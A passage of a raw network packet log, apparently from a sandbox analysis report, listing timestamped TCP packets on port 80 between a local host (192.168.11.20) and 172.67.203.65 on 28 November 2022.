Nov 28, 2022 12:46:58.036292076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036355019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036369085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036381006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036392927 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036403894 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036416054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036427021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036438942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036449909 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036462069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036464930 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.036473989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036484957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036497116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036513090 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.036562920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036577940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036592960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036601067 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.036606073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036617041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036631107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036643028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036654949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036667109 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036678076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036681890 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.036689997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036700964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036712885 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036725044 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036736965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036747932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036760092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036820889 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036825895 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.036834002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036845922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036856890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036869049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036880970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036891937 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036904097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036906958 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.036915064 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036926985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036938906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036951065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036962986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.036973953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037000895 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.037072897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037087917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037100077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037111044 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037122965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037134886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037147045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037158012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037167072 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.037169933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037180901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037193060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037204981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037215948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037228107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037275076 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.037322998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037334919 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037347078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037358046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037369967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037381887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037393093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037405014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037415981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037427902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037439108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037451029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037451982 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.037467957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037481070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037492990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037508011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037519932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037532091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037535906 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.037544012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037558079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037570000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037581921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037592888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037605047 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037616968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037627935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037640095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037651062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037662029 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.037662983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037673950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037686110 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037698030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037709951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037720919 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037733078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037745953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037758112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037769079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037781000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037791967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037803888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037806034 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.037815094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037827015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037838936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037853003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037868977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037882090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037893057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037903070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037904978 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.037918091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037930965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037941933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037952900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037962914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037972927 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037983894 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.037995100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038005114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038016081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038083076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038096905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038109064 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038120985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038120985 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.038131952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038144112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038156033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038167000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038178921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038191080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038202047 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038202047 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.038213968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038224936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038336039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038346052 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.038348913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038361073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038372040 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038383961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038394928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038407087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038418055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038429976 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038441896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038453102 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038463116 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.038465023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038476944 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038487911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038499117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038511038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038522959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038535118 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.038589001 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038598061 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.038602114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038613081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038625002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038635969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038647890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038660049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038671017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038682938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038693905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038706064 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038717985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038723946 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.038728952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038741112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038752079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038764000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038775921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038842916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038855076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038866043 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038877964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038888931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038894892 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.038901091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038913012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038923979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038935900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038948059 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038959980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038970947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038983107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.038985014 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.038995028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039096117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039108038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039119959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039130926 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039143085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039155006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039166927 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039177895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039190054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039201021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039201021 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.039216995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039231062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039243937 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039254904 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.039254904 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039267063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039278030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039289951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039304018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039315939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039328098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039402008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039414883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039427042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039438009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039444923 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.039449930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039462090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039473057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039484978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039496899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039509058 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039516926 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.039520025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039531946 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039544106 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039555073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039566994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039578915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039591074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039602995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039614916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039625883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039638042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039649963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039661884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039673090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039685011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039696932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039709091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039720058 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039731979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039732933 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.039742947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039755106 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039766073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039777994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039788961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039800882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039813042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039813995 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.039813995 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.039824963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039839029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039850950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039911985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039923906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039936066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039947033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039958954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039971113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039982080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.039994001 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040005922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040018082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040029049 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.040029049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040040970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040052891 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040065050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040076017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040082932 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.040087938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040100098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040159941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040173054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040184021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040195942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040208101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040219069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040230989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040241957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040258884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040271997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040283918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040290117 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.040294886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040335894 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040354967 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.040380955 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040409088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040421963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040432930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040445089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040456057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040467978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040478945 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.040479898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040493011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040503979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040515900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040528059 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040539026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040556908 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040570021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040580988 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040592909 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040604115 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040616035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040628910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040641069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040641069 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.040651083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040662050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040673971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040685892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040697098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040708065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040719032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040729046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040730953 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.040740013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040750980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040760994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040771961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040781975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040792942 CET	80	49836	172.67.203.65	192.168.11.20
